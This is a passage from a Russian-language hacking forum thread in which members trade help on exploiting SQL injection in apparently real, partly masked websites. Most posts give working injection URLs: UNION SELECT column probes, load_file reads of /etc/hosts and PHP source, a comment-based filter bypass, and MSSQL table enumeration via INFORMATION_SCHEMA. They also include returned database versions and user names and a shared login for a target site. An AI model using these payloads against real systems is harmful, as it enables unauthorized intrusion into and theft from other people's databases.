Старый 06.03.2011, 10:44   #871
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

d0znpp
Может в 2008 Logins стали зарезервированным? - попробуй обрамить квадратными скобками имя таблицы.
SynQ вне форума   Ответить с цитированием
Старый 06.03.2011, 14:37   #872
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Дело говоришь!Там была не Logins таблица. Не знал и не подумал про такое, огромное спасибо!
d0znpp вне форума   Ответить с цитированием
Старый 07.03.2011, 22:57   #873
Chelios
 
Регистрация: 05.07.2010
Сообщений: 42
Репутация: 14
По умолчанию

скуля:
Код:
http://***.ru/print.php?nid=-2058+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
file_priv = Y

пробую читать файл:
Код:
http://***.ru/print.php?nid=-2058+union+select+1,2,3,4,load_file('/var/www/bg-znanie/print.php'),6,7,8,9,10,11,12,13,14,15+from+mysql.user--+

http://***.ru/print.php?nid=-2058+union+select+1,2,3,4,load_file('/etc/hosts'),6,7,8,9,10,11,12,13,14,15+from+mysql.user--+
...
пусто. почему не читаются файлы?

Последний раз редактировалось Twost; 16.05.2013 в 09:02..
Chelios вне форума   Ответить с цитированием
Старый 07.03.2011, 23:23   #874
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 252
Репутация: 155
По умолчанию

http://***.ru/print.php?nid=-2058+union+select+1,2,3,4,file_priv,6,7,8,9,10,11, 12,13,14,15+from+mysql.user+where+user='dbu_ansimo v_1'--+
file_priv = N

(как вы его проверяете, блин 0_о)

а читать можешь так
http://***.ru/print.php?nid=-2058+union+select+0x2f7661722f7777772f62672d7a6e61 6e69652f696e6465782e70687000,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15+from+mysql.user--+
__________________
------------------

Последний раз редактировалось Twost; 16.05.2013 в 09:02..
Jokester вне форума   Ответить с цитированием
Старый 08.03.2011, 13:19   #875
pinch
 
Регистрация: 02.11.2010
Сообщений: 20
Репутация: 2
По умолчанию

помогите с инъекцией

http://www.***.com/classified/Listing.php?radius=150+and+substring(@@version,1,1 )=5&rlat=12.9334051&rlon=77.5415307&mode=srch&catn ame=Investment+Opportunities

пока что раскрутил как блинд может по иному получиться?

Последний раз редактировалось Twost; 16.05.2013 в 09:02..
pinch вне форума   Ответить с цитированием
Старый 08.03.2011, 14:32   #876
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Код:
http://www.***.com/classified/Listing.php?keyword=Enter+Keyword+%28optional%29&srchcity=Enter+City+%28optional%29&srchcountry=&catname=%27&mode=srch&x=30&y=9
Цитата:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buford/public_html/classified/Listing.php on line 260
Couldn't execute queryselect * ,DATE_FORMAT(date,'%W %M %D, %Y') as cdate FROM `\\\'` WHERE city LIKE '%%' AND activate = 'activate' ORDER BY `date` DESC limit 0,20
` используються

Роскручиваеться легко.

Палим название таблицы, колонок с запроса.

order by определил 19 полей, но связка union + select бестолку, тогда схитрим.

В начале стоит *, тоесть с двух таблиц будет вытаскиваться одновременно.

Не вникая в контент выберяем атрибуты от фонаря

Код:
catname=Announcements`,(select version() as adtitle union select database() as contact union select user() as description)x--
Код:
http://www.***.com/classified/Listing.php?keyword=Enter Keyword (optional)&srchcity=Enter City (optional)&srchcountry=&catname=Announcements`,(select version() as adtitle union select database() as contact union select user() as description)x-- &mode=srch&x=30&y=9
я угадал

5.0.91-community

Последний раз редактировалось Twost; 16.05.2013 в 09:03..
}{оттабыч вне форума   Ответить с цитированием
Старый 09.03.2011, 22:55   #877
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Добрый вечер.

Заливался кто-нибудь через tinybrowser(без джумлы)?
Cross вне форума   Ответить с цитированием
Старый 11.03.2011, 19:11   #878
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

http://www.***.org/index.php?p=news&id=-1+union+select+1,2,3,4,5,6,7,8,9+--+1
Тут чё можно сделать? Фильтруется связка union+select, не помогает обход типа uNion SeLect или /**/

Последний раз редактировалось Twost; 16.05.2013 в 09:03..
Nightmare вне форума   Ответить с цитированием
Старый 11.03.2011, 19:18   #879
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
http://www.***.org/index.php?p=news&id=-1+union+select+1,2,3,4,5,6,7,8,9+--+1
Тут чё можно сделать? Фильтруется связка union+select, не помогает обход типа uNion SeLect или /**/
Код:
http://www.***.org/index.php?p=news&id=-1/*!union*/+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9+--+
5.1.52::colorado_chadfin@localhost::colorado_chadf inal

Последний раз редактировалось Twost; 16.05.2013 в 09:03..
aka_zver вне форума   Ответить с цитированием
Старый 11.03.2011, 20:55   #880
rsaReliableS
 
Регистрация: 29.07.2010
Сообщений: 36
Репутация: 7
По умолчанию

Имеется sqli в mssql без вывода ошибки.
Сайт: www.***.ru

Перед проведением атаки следует вторизоваться тут: http://www.***.ru/enter.php. Например по этому акку: login:a1840198 pass:a1840198

sqli:
Цитата:
/reg.php?id=355569+and+1=1
По логике: если запрос верен - в текстбокстах отображается уже имеющаяся инфа.

Ступор на получении списка таблиц. Получаем одну так:
Цитата:
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES
Далее пробую сначала брать следующию так:
Цитата:
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME%3E%27mb_spare_ua%27
Цитата:
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME%3E%27mboards%27
Но удается выудить только три, потом идет повтор:
Цитата:
mb_spare_ua
mboards
MbTopics_ForDel
MbTopics_ForDel
...
NOT IN тоже не прокатил:
Цитата:
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME+NOT+IN+('mb_spare_ua','mboards') -- ATIForums_Forum
Цитата:
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME+NOT+IN+('mb_spare_ua','mboards','ATIForums_ Forum') -- ATIForums_Forum
Опять повтор. Почитал доки. select top - возвращает случайныую запись. Умельцы как-то убирают случайность, добовляя в конец order+by+<*>. Но я не докурил как =(

Подставляя случайные слова в первый методе смог получить вот такой список таблиц:
Цитата:
MbTopics_ForDel
WebService
WebServiceClient
WindRose
mb_spare_ua
mboards
ATIForums_Forum
Кузова
Марки транспорт
RegionCodes
WarnTypes
MSP_TIMEPHASED_DATA --(Вывело MSP_TIMEPHASED_, но гугл указал что это дефолт таблица MSP_TIMEPHASED_DATA)
ways
waysinfo
Как вытащить все таблицы? Мне бы увидеть пример имуляции limit, вывести колонки и инфу думаю смогу сам.

Последний раз редактировалось Twost; 16.05.2013 в 09:04..
rsaReliableS вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot